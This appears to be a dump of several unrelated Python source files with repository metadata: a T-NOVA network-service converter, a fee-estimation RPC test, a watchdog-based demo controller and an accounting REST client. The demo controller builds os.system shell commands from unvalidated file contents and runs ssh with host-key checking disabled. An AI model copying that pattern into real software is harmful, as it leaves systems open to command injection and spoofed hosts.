"""
Initialize TNOVAConverter by reading cached VNFDs from file.
:return: None
"""
self.log.info("Initialize %s..." % self.__class__.__name__)
self.log.debug("Use VNFCatalogue: %s" % self.__catalogue)
def parse_nsd_from_file (self, nsd_file):
"""
Parse the given NSD as :any:`NSWrapper` from the file given by nsd_file.
nsd_file can be relative to $PWD.
:param nsd_file: NSD file path
:type nsd_file: str
:return: parsed NSD
:rtype: NSWrapper
"""
try:
with open(os.path.abspath(nsd_file)) as f:
return json.load(f, object_hook=self.__nsd_object_hook)
except IOError as e:
self.log.error("Got error during NSD parse: %s" % e)
sys.exit(1)
@classmethod
def parse_nsd_from_text (cls, raw):
"""
Parse the given NSD as :any:`NSWrapper` from raw data.
:param raw: raw NSD data
:type raw: str
:return: parsed NSD
:rtype: NSWrapper
"""
return json.loads(raw, object_hook=cls.__nsd_object_hook)
@staticmethod
def __nsd_object_hook (obj):
"""
Object hook function for converting the top-level dict into an
:any:`NSWrapper` instance.
"""
return NSWrapper(raw=obj['nsd']) if 'nsd' in obj else obj
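# Example of the hook above: {"nsd": {...}} is wrapped as NSWrapper(raw={...});
# any other (nested) dict without an 'nsd' key is returned unchanged.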
def __convert_nfs (self, nffg, ns, vnfs):
"""
Create NF nodes in given NFFG based on given NF and VNFs.
:param nffg: main NFFG object
:type nffg: NFFG
:param ns: NSD wrapper object
:type ns: NSWrapper
:param vnfs: VNF catalogue
:type vnfs: VNFCatalogue
:return: None
"""
# Add NFs
for domain, nf_id, num in ns.get_vnf_instances():
vnf = vnfs.get_by_id(nf_id)
if vnf is None:
self.log.error(
"VNFD with id: %s is not found in the VNFCatalogue!" % nf_id)
raise MissingVNFDException(nf_id)
# Forge NF id to be unique within an NFFG
base_id = vnf.get_vnf_name()
self.log.debug('Found VNF with id: %s --> %s' % (nf_id, base_id))
if num is not None:
base_id = "%s_%s" % (base_id, num)
node_nf = nffg.add_nf(id=base_id,
name=vnf.name,
func_type=vnf.get_vnf_type(),
dep_type=vnf.get_deployment_type(),
**vnf.get_resources())
self.log.debug("Create VNF: %s" % node_nf)
node_nf.add_metadata("store_id", nf_id)
# Add ports to NF
for port, data in vnf.get_ports():
nf_port = node_nf.add_port(id=port)
self.log.debug("Added NF port: %s" % nf_port)
if 'sap' in data:
nf_port.sap = data['sap']
self.log.debug("Added sap: %s" % nf_port.sap)
if 'technology' in data:
nf_port.technology = data['technology']
self.log.debug("Added technology: %s" % nf_port.technology)
if 'role' in data:
nf_port.role = data['role']
self.log.debug("Added role: %s" % nf_port.role)
if 'mac' in data:
nf_port.l2 = data['mac']
self.log.debug("Added l2 address: %s" % nf_port.l2)
if 'ip' in data:
nf_port.l3.add_l3address(id=data['ip'], configure=True,
requested=data['ip'])
self.log.debug("Added l3 address: %s" % data['ip'])
# Detect INTERNET ports
for iport in vnf.get_internet_ports():
if iport not in node_nf.ports:
# INTERNET port is not external
nf_port = node_nf.add_port(id=iport, sap="INTERNET")
self.log.debug("Added new INTERNET port: %s" % nf_port)
else:
nf_port = node_nf.ports[iport]
# Set SAP attribute for INTERNET port
nf_port.sap = "INTERNET"
# Add metadata
for md, value in vnf.get_metadata().iteritems():
if md == 'bootstrap_script':
node_nf.add_metadata(name='command', value=value)
self.log.debug("Found command: %s", value)
elif md == 'vm_image':
node_nf.add_metadata(name='image', value=value)
self.log.debug("Found image: %s", value)
elif md == 'variables':
node_nf.add_metadata(name='environment',
value=self._parse_variables(value=value))
self.log.debug("Found environment: %s",
node_nf.metadata['environment'])
elif md == 'networking_resources':
# Add port bindings
for iport in vnf.get_internet_ports():
port = node_nf.ports[iport]
port.l4 = self._parse_port_bindings(value=value)
self.log.debug("Added port bindings: %s" % port.l4)
# Add IP assignments
ips = self._parse_ip_address_binding(value=value)
self.log.debug("Detected IP assignments: %s" % ips)
regular_ports = vnf.get_non_internet_ports()
if len(regular_ports) < len(ips):
self.log.warning("Detected more IP address: %s for assignment "
"then available ports: %s!" % (ips, regular_ports))
for i, ip in enumerate(ips):
port_id = regular_ports[i]
bound_port = node_nf.ports[port_id]
bound_port.l3.add_l3address(id=ip, configure=True, requested=ip)
self.log.debug("Added IP assignment: port: %s --> %s" % (i, ip))
self.log.info("Added NF: %s" % node_nf)
@staticmethod
def _parse_variables (value):
envs = {}
envs.update(map(lambda x: x.split('=', 1) if '=' in x else (x, None),
[str(kv) for kv in value.split()]))
return str(envs).replace('"', "'")
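# Illustrative example (assumed input: whitespace-separated KEY=VALUE pairs;
# tokens without '=' are mapped to None):
#   _parse_variables("USER=admin DEBUG") --> "{'USER': 'admin', 'DEBUG': None}"
# (dict ordering may vary; double quotes are replaced so the result embeds
# cleanly as NFFG metadata)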
@staticmethod
def _parse_port_bindings (value):
ports = {}
splitted = []
for i in value.replace(',', ' ').split():
try:
splitted.append(int(i))
except ValueError:
pass
ports.update(map(lambda x: ("%s/tcp" % x, ('', x)), splitted))
return str(ports).replace('"', "'")
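# Illustrative example (assumed input: comma/whitespace-separated numeric TCP
# ports; non-numeric tokens are silently dropped):
#   _parse_port_bindings("8080, 9000") --> "{'8080/tcp': ('', 8080), '9000/tcp': ('', 9000)}"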
@staticmethod
def _parse_ip_address_binding (value):
ip_addresses = []
for i in value.replace(',', ' ').split():
if len(i.split('.')) == 4:
ip_addresses.append(i)
return ip_addresses
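# Illustrative example (only tokens with exactly four dot-separated parts are
# kept as IPv4 addresses; no further validation is done):
#   _parse_ip_address_binding("10.0.0.1, tcp:8080") --> ['10.0.0.1']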
def __convert_saps (self, nffg, ns, vnfs):
"""
Create SAP nodes in given NFFG based on given NF and VNFs.
:param nffg: main NFFG object
:type nffg: NFFG
:param ns: NSD wrapper object
:type ns: NSWrapper
:param vnfs: VNF catalogue
:type vnfs: VNFCatalogue
:return: None
"""
# Add SAPs
for cp in ns.get_saps():
cp = cp.split(':')[0]
try:
sap_id = int(cp)
except ValueError:
sap_id = cp
if sap_id in nffg:
self.log.info("SAP: %s was already added, skip" % sap_id)
continue
node_sap = nffg.add_sap(id=sap_id,
name=sap_id)
self.log.info("Added SAP: %s" % node_sap)
# Add default port to SAP with random name
sap_port = node_sap.add_port(id=self.DEFAULT_SAP_PORT_ID)
self.log.info("Added SAP port: %s" % sap_port)
def __process_tag (self, abstract_id, ns_id):
"""
Generate a valid VLAN id from the raw_id data, which is derived directly
from an SG hop link id.
Moved from: escape.adapt.managers.InternalDomainManager#__process_tag
:param abstract_id: raw link id
:type abstract_id: str or int
:return: valid VLAN id
:rtype: int
"""
tag_id = "%s-%s" % (abstract_id, ns_id)
# Check if the abstract tag has already been processed
if tag_id in self.vlan_register:
self.log.debug("Found already register TAG ID: %s ==> %s" % (
tag_id, self.vlan_register[tag_id]))
return self.vlan_register[tag_id]
# Check if the raw_id is a valid number
try:
vlan_id = int(tag_id)
# Check if the raw_id is free
if 0 < vlan_id < 4095 and vlan_id not in self.vlan_register.itervalues():
self.vlan_register[tag_id] = vlan_id
self.log.debug(
"Abstract ID a valid not-taken VLAN ID! Register %s ==> %s" % (
tag_id, vlan_id))
return vlan_id
except ValueError:
# Can't be converted to int, continue with raw_id processing
pass
trailer_num = re.search(r'\d+$', tag_id)
# If the raw_id ends with number
if trailer_num is not None:
# Check if the trailing number is a valid VLAN id (0 and 4095 are
# reserved)
trailer_num = int(trailer_num.group()) # Get matched data from Match obj
# Check if the VLAN candidate is free
if 0 < trailer_num < 4095 and \
trailer_num not in self.vlan_register.itervalues():
self.vlan_register[tag_id] = trailer_num
self.log.debug(
"Trailing number is a valid non-taken VLAN ID! Register %s ==> "
"%s..." % (tag_id, trailer_num))
return trailer_num
# else Try to find a free VLAN
else:
self.log.debug(
"Detected trailing number: %s is not a valid VLAN or already "
"taken!" % trailer_num)
# No valid VLAN number has found from tag_id, try to find a free VLAN
for vlan in xrange(1, 4094):
if vlan not in self.vlan_register.itervalues():
self.vlan_register[tag_id] = vlan
self.log.debug(
"Generated and registered VLAN id %s ==> %s" % (tag_id, vlan))
return vlan
# For loop is exhausted
else:
self.log.error("No available VLAN id found!")
return None
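# Illustrative examples with hypothetical ids:
#   __process_tag(42, "ns7"): "42-ns7" is not an int, so the trailing digits
#   "7" are used if 7 is a free VLAN id --> returns 7
#   __process_tag("link", "ns"): no trailing digits --> first unused VLAN id
# Once registered, the same (link id, NS id) pair always maps to the same VLAN.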
def __convert_sg_hops (self, nffg, ns, vnfs):
"""
Create SG hop edges in given NFFG based on given NF and VNFs.
:param nffg: main NFFG object
:type nffg: NFFG
:param ns: NSD wrapper object
:type ns: NSWrapper
:param vnfs: VNF catalogue
:type vnfs: VNFCatalogue
:return: None
"""
# Add SG hops
for vlink in ns.get_vlinks():
# Parse src params
src_node = vnfs.get_by_id(vlink['src_node'])
if src_node is not None:
src_node_id = src_node.get_vnf_name()
if vlink['src_node_num'] is not None:
src_node_id = "%s_%s" % (src_node_id, vlink['src_node_num'])
src_port_id = vlink['src_port']
src_port = nffg[src_node_id].ports[src_port_id]
# If the id is not in the VNF Catalogue, it must be a SAP
else:
src_port = nffg[vlink['src_node']].ports.container[0]
self.log.debug("Got src port: %s" % src_port)
# Parse dst params
dst_node = vnfs.get_by_id(vlink['dst_node'])
if dst_node is not None:
dst_node_id = dst_node.get_vnf_name()
if vlink['dst_node_num'] is not None:
dst_node_id = "%s_%s" % (dst_node_id, vlink['dst_node_num'])
dst_port_id = vlink['dst_port']
dst_port = nffg[dst_node_id].ports[dst_port_id]
# If the id is not in the VNF Catalogue, it must be a SAP
else:
dst_port = nffg[vlink['dst_node']].ports.container[0]
self.log.debug("Got dst port: %s" % dst_port)
# Generate SG link id compatible with ESCAPE's naming convention
link_id = self.__process_tag(vlink['id'], ns.id)
# Add SG hop
link_sg = nffg.add_sglink(id=link_id,
src_port=src_port,
dst_port=dst_port,
flowclass=vlink['flowclass'],
delay=vlink['delay'],
bandwidth=vlink['bandwidth'])
self.log.info("Added SG hop: %s" % link_sg)
self.log.debug("Managed Service hop IDs:\n%s"
% pprint.pformat(self.vlan_register))
def __convert_e2e_reqs (self, nffg, ns, vnfs):
"""
Create E2E Requirement edges in given NFFG based on given NF and VNFs.
:param nffg: main NFFG object
:type nffg: NFFG
:param ns: NSD wrapper object
:type ns: NSWrapper
:param vnfs: VNF catalogue
:type vnfs: VNFCatalogue
:return: None
"""
# Add e2e requirement links
# Get service chains from NFP.graph
reqs = ns.get_e2e_reqs()
# Get E2E requirements from SLAs
for chain in ns.get_nfps():
self.log.debug("Process chain: %s" % chain)
# Create set from SLA ids referred in vlinks in NFP graph list
req_id = {ns.get_vlink_sla_ref(id) for id in chain}
# Only one SLA (aka requirement) must be referred through a NFP
if len(req_id) < 1:
self.log.warning("No SLA id has detected in the NFP: %s! "
"Skip SLA processing..." % chain)
return
elif len(req_id) > 1:
self.log.error("Multiple SLA id: %s has detected in the NFP: %s! "
"Skip SLA processing..." % (req_id, chain))
return
else:
req_id = req_id.pop()
self.log.debug("Detected Requirement link ref: %s" % req_id)
if req_id not in reqs:
self.log.warning(
"SLA definition with id: %s was not found in detected SLAs: %s!" % (
req_id, reqs))
continue
src_node, src_node_num, src_port = ns.get_src_port(vlink_id=chain[0])
if src_node_num is not None:
src_node_id = "%s_%s" % (src_node, src_node_num)
else:
src_node_id = src_node
# If src_port is a valid port of a VNF
if src_port is not None:
try:
src_port = int(src_port)
except ValueError:
pass
src = nffg[src_node_id].ports[src_port]
# If src_node is a SAP but the default SAP port constant is set
elif self.DEFAULT_SAP_PORT_ID is not None:
src = nffg[src_node].ports[self.DEFAULT_SAP_PORT_ID]
# Else get the only port from SAP
else:
src = nffg[src_node].ports.container[0]
self.log.debug("Found src port object: %s" % src)
dst_node, dst_node_num, dst_port = ns.get_dst_port(vlink_id=chain[-1])
if dst_node_num is not None:
dst_node_id = "%s_%s" % (dst_node, dst_node_num)
else:
dst_node_id = dst_node
# If dst_port is a valid port of a VNF
if dst_port is not None:
try:
dst_port = int(dst_port)
except ValueError:
pass
dst = nffg[dst_node_id].ports[dst_port]
# If dst_node is a SAP but the default SAP port constant is set
elif self.DEFAULT_SAP_PORT_ID is not None:
dst = nffg[dst_node].ports[self.DEFAULT_SAP_PORT_ID]
# Else get the only port from SAP
else:
dst = nffg[dst_node].ports.container[0]
self.log.debug("Found dst port object: %s" % dst)
req_link = nffg.add_req(id=req_id,
src_port=src,
dst_port=dst,
delay=reqs[req_id]['delay'],
bandwidth=reqs[req_id]['bandwidth'],
sg_path=[int(id) for id in chain])
self.log.info("Added requirement link: %s" % req_link)
def convert (self, nsd_file):
"""
Main converter function which parses the VNFD and NSD files, creates the
VNF catalogue and converts the NSD given by nsd_file into :any:`NFFG`.
:param nsd_file: NSD file path
:type nsd_file: str
:return: created NFFG object
:rtype: :any:`NFFG`
"""
# Parse required descriptors
self.log.info("Parsing Network Service (NS) from NSD file: %s" % nsd_file)
ns = self.parse_nsd_from_file(nsd_file)
if not self.__catalogue.VNF_STORE_ENABLED:
self.log.info("Parsing new VNFs from VNFD files under: %s" %
self.__catalogue.VNF_CATALOGUE_DIR)
vnfs = self.__catalogue.parse_vnf_catalogue_from_folder()
self.log.debug("Registered VNFs: %s" % vnfs.get_registered_vnfs())
# Create main NFFG object
nffg = NFFG(id=ns.id, service_id=ns.id, name=ns.name)
# Convert NFFG elements
try:
self.log.debug("Convert NF nodes...")
self.__convert_nfs(nffg=nffg, ns=ns, vnfs=self.__catalogue)
self.log.debug("Convert SAP nodes...")
self.__convert_saps(nffg=nffg, ns=ns, vnfs=self.__catalogue)
self.log.debug("Convert Service Graph hop edges...")
self.__convert_sg_hops(nffg=nffg, ns=ns, vnfs=self.__catalogue)
self.log.debug("Convert E2E Requirement edges...")
self.__convert_e2e_reqs(nffg=nffg, ns=ns, vnfs=self.__catalogue)
self.log.debug("Extend request with optional translations...")
self.apply_extensions(nffg=nffg)
except MissingVNFDException as e:
self.log.error(e)
return None
except:
self.log.exception(
"Got unexpected exception during NSD -> NFFG conversion!")
return None
# Return with assembled NFFG
return nffg
def setup_placement_criteria (self, nffg, params):
"""
Setup customer SAP ids based on given `placement`.
:param nffg: service request
:type nffg: :class:`NFFG`
:param params: params dict received in HTTP request
:type params: dict
:return: None
"""
if 'placement' not in params:
self.log.warning("No placement was found in request params: %s" % params)
return
for i, placement in enumerate(params['placement']):
# placement format: <vnf_id>@<domain>-<num>
# VNF id format: <vnf_id>_<num>@<si_id>
if 'vnf' not in placement.keys() or 'subnet' not in placement.keys():
self.log.warning("Wrong placement criterion format: %s" % placement)
continue
if placement['subnet'] == self.DEFAULT_PLACEMENT_SUBNET:
self.log.debug("Detected default placement value: %s. "
"Skip consumer SAP id setup!" % placement['subnet'])
continue
self.log.debug("Searching NF node for VNF: %s..." % placement['vnf'])
vnf_id = placement['vnf'].split('@', 1)[0]
num = placement['vnf'].split('-')[-1]
try:
vnf_id = int(vnf_id)
except ValueError:
self.log.warning("Got VNF id: %s is not valid integer!" % vnf_id)
continue
converted_vnf_id = self.__catalogue.get_by_id(id=vnf_id).get_vnf_name()
base_nf_id = "%s_%s" % (converted_vnf_id, num)
self.log.debug("Found base NF name: %s" % base_nf_id)
nf = [nf for nf in nffg.nfs if str(nf.id).startswith(base_nf_id)]
if len(nf) != 1:
self.log.error("No unique NF was found for id: %s in %s"
% (base_nf_id, nf))
continue
nf = nf.pop()
self.log.debug("Found NF: %s" % nf)
nf_port = [p for p in nf.ports
if p.sap is not None and p.sap.startswith(
'INTERNET') and p.role != "consumer"]
if len(nf_port) > 1:
self.log.warning("Multiple INTERNET port was detected in NF: "
"%s --> %s" % (nf.id, nf_port))
elif len(nf_port) < 1:
self.log.warning("No INTERNET port was detected in NF: %s" % nf.id)
nf_port = [nf.add_port(id=placement['subnet'],
name="INTERNET")]
self.log.debug("Added arbitrary INTERNET port: %s" % nf_port)
else:
self.log.debug("Found INTERNET port: %s" % nf_port)
for port in nf_port:
if port.role is not None and port.role != "consumer":
self.log.warning("Found role: %s for port: %s! Skip overriding" %
(port.role, port))
continue
port.role = "consumer"
port.sap = placement['subnet']
self.log.debug("Update %s with consumer id: %s" % (port, port.sap))
def setup_metadata (self, nffg, params):
"""
Add metadata (k-v pairs) for VNF instances. Only antiaffinity is supported!
:param nffg: service request
:type nffg: :class:`NFFG`
:param params: params dict received in HTTP request
:type params: dict
:return: None
"""
if 'params' not in params:
self.log.warning("No extra data parameters were found in request: %s" %
params)
return
for i, metadata in enumerate(params['params']):
# instance: <vnf_id>@<domain>-<num> or uuid of the NS
# key: antiaffinity (currently only antiaffinity support)
# value: <vnf_id>@<domain>-<num>
# VNF id format: <vnf_id>_<num>_<si_id>
if metadata['key'] != self.ANTIAFFINITY_CONSTRAINT:
self.log.debug("Not supported metadata key: %s. Skip processing." %
metadata['key'])
continue
# Searching NF node
self.log.debug("Searching NF node for VNF: %s..." % metadata['instance'])
vnf_id = metadata['instance'].split('@', 1)[0]
num = metadata['instance'].split('-')[-1]
try:
vnf_id = int(vnf_id)
except ValueError:
self.log.warning("Got VNF id: %s is not valid integer!" % vnf_id)
continue
converted_vnf_id = self.__catalogue.get_by_id(id=vnf_id).get_vnf_name()
base_nf_id = "%s_%s" % (converted_vnf_id, num)
self.log.debug("Found base NF name: %s" % base_nf_id)
nf = [nf for nf in nffg.nfs if str(nf.id).startswith(base_nf_id)]
if len(nf) != 1:
self.log.error("No unique NF was found for id: %s in %s"
% (base_nf_id, nf))
continue
nf = nf.pop()
self.log.debug("Found NF: %s" % nf)
# Searching other NF node, target of antiaffinity constraint
self.log.debug("Searching target NF node of antiaffinity constraint "
"for VNF: %s..." % metadata['value'])
vnf_aaff_id = metadata['value'].split('@', 1)[0]
num_aaff = metadata['value'].split('-')[-1]
try:
vnf_aaff_id = int(vnf_aaff_id)
except ValueError:
self.log.warning("Got target VNF id: %s is not valid integer!"
% vnf_aaff_id)
continue
c_vnf_aaff_id = self.__catalogue.get_by_id(id=vnf_aaff_id).get_vnf_name()
base_nf_aaff_id = "%s_%s" % (c_vnf_aaff_id, num_aaff)
self.log.debug("Found target base NF name: %s" % base_nf_aaff_id)
nf_aaff = [n for n in nffg.nfs if str(n.id).startswith(base_nf_aaff_id)]
if len(nf_aaff) != 1:
self.log.error("No unique target NF was found for id: %s in %s"
% (base_nf_aaff_id, nf))
continue
nf_aaff = nf_aaff.pop()
self.log.debug("Found target NF: %s" % nf_aaff)
# Setup antiaffinity constraint
for j in range(1,10):
# Search next free id
if nf.constraints.has_antiaffinity(j):
continue
else:
nf.constraints.add_antiaffinity(j, str(nf_aaff.id))
self.log.debug("Antiaffinity constraint added "
"for NF: %s -- target NF: %s)" % (nf, nf_aaff))
break
else:
self.log.error("Max number of allowed antiafinity constraints exceeded"
"with NF: %s -- target NF: %s" % (nf, nf_aaff))
def apply_extensions (self, nffg):
"""
:param nffg:
:return:
"""
VCDN_ROLE_ID = "CACHE"
self.log.debug("Running vCDN port translations...")
nfs = [nf for nf in nffg.nfs]
for nf in nfs:
if nf.name.upper() == "VCDN_CACHE":
self.log.debug("Found vCDN NF: %s!" % nf.id)
if len(nf.ports) != 2:
self.log.warning("vCDN NF: %s should have exactly 2 ports not %s!"
% (nf.id, len(nf.ports)))
for port in nf.ports:
if port.sap is None and port.role is None:
self.log.debug("Detected non-SAP port: %s" % port.id)
port.sap = VCDN_ROLE_ID
port.role = "provider"
self.log.debug("Set provider SAP id: %s for NF: %s" % (port.sap,
nf.id))
# elif nf.functional_type.upper() == "FE2SAP":
# self.log.debug("Found fe2sap NF: %s" % nf.id)
# if len(nf.ports) != 2:
# self.log.error("Helper NF: %s should have exactly 2 ports not %s!"
# % (nf.id, len(nf.ports)))
# continue
# sap_port = [p for p in nf.ports][-1]
# sap_port.sap = VCDN_ROLE_ID
# sap_port.role = "consumer"
# self.log.debug("Set consumer SAP id: %s for NF: %s" % (sap_port.sap,
# nf.id))
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="TNOVAConverter: Converting Network Services "
"from T-NOVA: NSD and VNFD files "
"into UNIFY: NFFG", add_help=True)
parser.add_argument("-c", "--catalogue", metavar="cdir",
default="vnf_catalogue",
help="path to the catalogue dir contains the VNFD files "
"(default: ./vnf_catalogue)")
parser.add_argument("-d", "--debug", action="store_const", dest="loglevel",
const=logging.DEBUG, default=logging.INFO,
help="run in debug mode")
parser.add_argument("-n", "--nsd", metavar="npath",
default="nsds/nsd_from_folder.json",
help="path of NSD file contains the Service Request "
"(default: ./nsds/nsd_from_folder.json)")
parser.add_argument("-o", "--offline", action="store_true", default=False,
help="work offline and read the VNFDs from files"
"(default: False)")
args = parser.parse_args()
# logging.setLoggerClass(ColoredLogger)
# logging.basicConfig(level=args.loglevel)
# log = logging.getLogger(__name__)
# log.setLevel(args.loglevel)
log = ColoredLogger.configure(level=args.loglevel)
catalogue = VNFCatalogue(use_remote=False, logger=log,
cache_dir=args.catalogue,
vnf_store_url="http://172.16.178.128:8080/NFS/vnfds")
# catalogue.VNF_STORE_ENABLED = True
catalogue.VNF_STORE_ENABLED = not args.offline
converter = TNOVAConverter(logger=log, vnf_catalogue=catalogue)
log.info("Start converting NS: %s..." % args.nsd)
nffg = converter.convert(nsd_file=args.nsd)
if nffg is not None:
log.info("Generated NFFG:\n%s" % nffg.dump())
``` |
{
"source": "5GL/5GL",
"score": 2
} |
#### File: qa/rpc-tests/smartfees.py
```python
from test_framework import 5GLTestFramework
from 5glrpc.authproxy import AuthServiceProxy, JSONRPCException
from util import *
class EstimateFeeTest(5GLTestFramework):
def setup_network(self):
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir,
["-debug=mempool", "-debug=estimatefee"]))
# Node1 mines small-but-not-tiny blocks, and allows free transactions.
# NOTE: the CreateNewBlock code starts counting block size at 1,000 bytes,
# so blockmaxsize of 2,000 is really just 1,000 bytes (room enough for
# 6 or 7 transactions)
self.nodes.append(start_node(1, self.options.tmpdir,
["-blockprioritysize=1500", "-blockmaxsize=2000",
"-debug=mempool", "-debug=estimatefee"]))
connect_nodes(self.nodes[1], 0)
# Node2 is a stingy miner, that
# produces very small blocks (room for only 3 or so transactions)
node2args = [ "-blockprioritysize=0", "-blockmaxsize=1500",
"-debug=mempool", "-debug=estimatefee"]
self.nodes.append(start_node(2, self.options.tmpdir, node2args))
connect_nodes(self.nodes[2], 0)
self.is_network_split = False
self.sync_all()
def run_test(self):
# Prime the memory pool with pairs of transactions
# (high-priority, random fee and zero-priority, random fee)
min_fee = Decimal("0.001")
fees_per_kb = [];
for i in range(12):
(txid, txhex, fee) = random_zeropri_transaction(self.nodes, Decimal("1.1"),
min_fee, min_fee, 20)
tx_kbytes = (len(txhex)/2)/1000.0
fees_per_kb.append(float(fee)/tx_kbytes)
# Mine blocks with node2 until the memory pool clears:
count_start = self.nodes[2].getblockcount()
while len(self.nodes[2].getrawmempool()) > 0:
self.nodes[2].setgenerate(True, 1)
self.sync_all()
all_estimates = [ self.nodes[0].estimatefee(i) for i in range(1,20) ]
print("Fee estimates, super-stingy miner: "+str([str(e) for e in all_estimates]))
# Estimates should be within the bounds of what transactions fees actually were:
delta = 1.0e-6 # account for rounding error
for e in filter(lambda x: x >= 0, all_estimates):
if float(e)+delta < min(fees_per_kb) or float(e)-delta > max(fees_per_kb):
raise AssertionError("Estimated fee (%f) out of range (%f,%f)"%(float(e), min_fee_kb, max_fee_kb))
# Generate transactions while mining 30 more blocks, this time with node1:
for i in range(30):
for j in range(random.randrange(6-4,6+4)):
(txid, txhex, fee) = random_transaction(self.nodes, Decimal("1.1"),
Decimal("0.0"), min_fee, 20)
tx_kbytes = (len(txhex)/2)/1000.0
fees_per_kb.append(float(fee)/tx_kbytes)
self.nodes[1].setgenerate(True, 1)
self.sync_all()
all_estimates = [ self.nodes[0].estimatefee(i) for i in range(1,20) ]
print("Fee estimates, more generous miner: "+str([ str(e) for e in all_estimates]))
for e in filter(lambda x: x >= 0, all_estimates):
if float(e)+delta < min(fees_per_kb) or float(e)-delta > max(fees_per_kb):
raise AssertionError("Estimated fee (%f) out of range (%f,%f)"%(float(e), min_fee_kb, max_fee_kb))
# Finish by mining a normal-sized block:
while len(self.nodes[0].getrawmempool()) > 0:
self.nodes[0].setgenerate(True, 1)
self.sync_all()
final_estimates = [ self.nodes[0].estimatefee(i) for i in range(1,20) ]
print("Final fee estimates: "+str([ str(e) for e in final_estimates]))
if __name__ == '__main__':
EstimateFeeTest().main()
``` |
{
"source": "5G-Measurement/PCC-Uspace",
"score": 2
} |
#### File: PCC-Uspace/pcc-gradient/filemonitor.py
```python
import sys
import time
import logging
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
import os
class NewSnapshotEventHandler(FileSystemEventHandler):
def __init__(self):
self.param = {}
self.param["Bandwidth"] = "100Mbit/s"
self.param["RTT"] = "30ms"
self.param["BufferSize"] = "50slots"
self.param["LossRate"] = "0"
self.is_start = False
def on_modified(self, event):
if event.is_directory is True:
return
with open("./parameters.txt", "r") as f:
param = f.read()
lines = param.split("\n")
tmp_param = {}
for line in lines:
if line == "stop" and self.is_start:
os.system("./stop_demo_compare_tcp_and_pcc.sh")
self.is_start = False
return
elif line == "start" and not self.is_start:
os.system("./run_demo_compare_tcp_and_pcc.sh")
self.is_start = True
elif line != "" and line !="start" and line != "stop":
tmp_param[line.split(" ")[0]] = line.split(" ")[1]
if tmp_param == self.param:
return
else:
self.param = tmp_param
if not self.is_start:
os.system("ssh -t -t -o StrictHostKeyChecking=no <EMAIL>@receiver1.demopair2.UIUCScheduling.emulab.net \"killall iperf && ./setup.bash {}\"".format(self.param["protocol"]))
os.system("ssh -t -t -o StrictHostKeyChecking=no <EMAIL>@receiver1.demopair2.UIUCScheduling.emulab.net \"nohup python ~/run_iperf.py &\"")
os.system("ssh -t -t -o StrictHostKeyChecking=no <EMAIL>[email protected] \"killall iperf && ./setup.bash {}\"".format(self.param["protocol"]))
os.system("python ./tune_bw_rtt_loss.py -b {} -d {} -q {} -l {}".format(self.param["Bandwidth"],
self.param["RTT"],
self.param["BufferSize"],
self.param["LossRate"]))
if __name__ == "__main__":
path = '.'
event_handler = NewSnapshotEventHandler()
observer = Observer()
observer.daemon = True
observer.schedule(event_handler, path, recursive=False)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
``` |
{
"source": "5g-media/accounting-agent",
"score": 3
} |
#### File: accounting-agent/accounting_client/accounting_client.py
```python
import json
import logging
from time import time
from rest_framework.status import HTTP_200_OK, HTTP_401_UNAUTHORIZED, HTTP_403_FORBIDDEN
from accounting_client.config import BASE_URL, ACCOUNTING_PASSWORD, ACCOUNTING_USERNAME, AUTH_URL, CLOSE_SESSIONS
from httpclient.client import Client
logger = logging.getLogger(__name__)
class AccountingClient(object):
"""Accounting Client Class.
This class serves as a wrapper for the Accounting/Billing services of 5G-MEDIA project,
as they are deployed in ENG's cloud. The methods implemented in this class are intended
for logging in to the services and opening/closing of NS, VNF and VDU sessions.
"""
__instance = None
def __init__(self):
"""Accounting Client Class Constructor."""
self.__client = Client(verify_ssl_cert=True)
self.__headers = {'Content-Type': 'application/json'}
self.login()
# Singleton Class
def __new__(cls):
if cls.__instance is not None:
return cls.__instance
else:
cls.__instance = super(AccountingClient, cls).__new__(cls)
return cls.__instance
def login(self):
"""Login to the Accounting/Billing Service."""
payload = {
'username': ACCOUNTING_USERNAME,
'password': <PASSWORD>
}
response = self.__client.post(url=AUTH_URL, headers=self.__headers, payload=json.dumps(payload))
if response.status_code == HTTP_200_OK:
self.__headers['Authorization'] = 'Bearer {}'.format(json.loads(response.text)['id_token'])
logger.info('Successfully logged on the accounting service')
def available_user_resource_list(self):
"""Get the available user resource list.
Returns:
user_resource_obj (object): A user resource list as a requests object
"""
url = BASE_URL + '/availableUserResourceList'
response = self.__client.get(url=url, headers=self.__headers)
if response.status_code == HTTP_200_OK:
return response
return None
def open_session_retrial(self, url, payload):
"""Retry opening a session after the authorization token has expired.
Args:
url (str): The url for the session opening request
payload (dict): The essential data to post for session opening
Returns:
session_id (int): The ID of the session that was opened
"""
self.login()
response = self.__client.post(url=url, headers=self.__headers, payload=json.dumps(payload))
if response.status_code == HTTP_200_OK:
session_id = int(response.text)
logger.info('Opened session with id {}'.format(session_id))
return session_id
def open_ns_session(self, ns):
"""Open a Network Service (NS) Session.
Args:
ns (obj): An NS Instance object
Returns:
ns_session_id (int): The ID of the opened NS session
"""
url = BASE_URL + '/openNsSession'
payload = {
'timestamp_sec': time(),
'catalog_tenant': ns.catalog_tenant,
'catalog_user': ns.catalog_user,
'mano_id': ns.mano_id,
'mano_project': ns.mano_project,
'mano_user': ns.mano_user,
'nfvipop_id': ns.nfvipop_id,
'ns_id': ns.uuid,
'ns_name': ns.name
}
logger.info('Attempting to open ns session with payload {}'.format(payload))
response = self.__client.post(url=url, headers=self.__headers, payload=json.dumps(payload))
logger.debug('Open ns session response: {}, Status code: {}'.format(response.text, response.status_code))
if response.status_code == HTTP_200_OK:
ns_session_id = int(response.text)
logger.info('Opened ns session with id {}'.format(ns_session_id))
return ns_session_id
elif response.status_code in [HTTP_401_UNAUTHORIZED, HTTP_403_FORBIDDEN]:
logger.warning('Token has expired and open_ns_session failed; retrying')
return self.open_session_retrial(url, payload)
def open_vnf_session(self, ns_session_id, vnf_uuid, vnf_name):
"""Open a Virtual Network Function (VNF) Session.
Args:
ns_session_id (int): The id of the NS session where the VNF belongs
vnf_uuid (str): The UUID of the VNF
vnf_name (str): The name of the VNF
Returns:
vnf_session_id (int): The ID of the opened VNF session
"""
url = BASE_URL + '/openVnfSession'
payload = {
'timestamp_sec': time(),
'ns_session_id': ns_session_id,
'vnf_id': vnf_uuid,
'vnf_name': vnf_name
}
logger.info('Attempting to open vnf session with payload {}'.format(payload))
response = self.__client.post(url=url, headers=self.__headers, payload=json.dumps(payload))
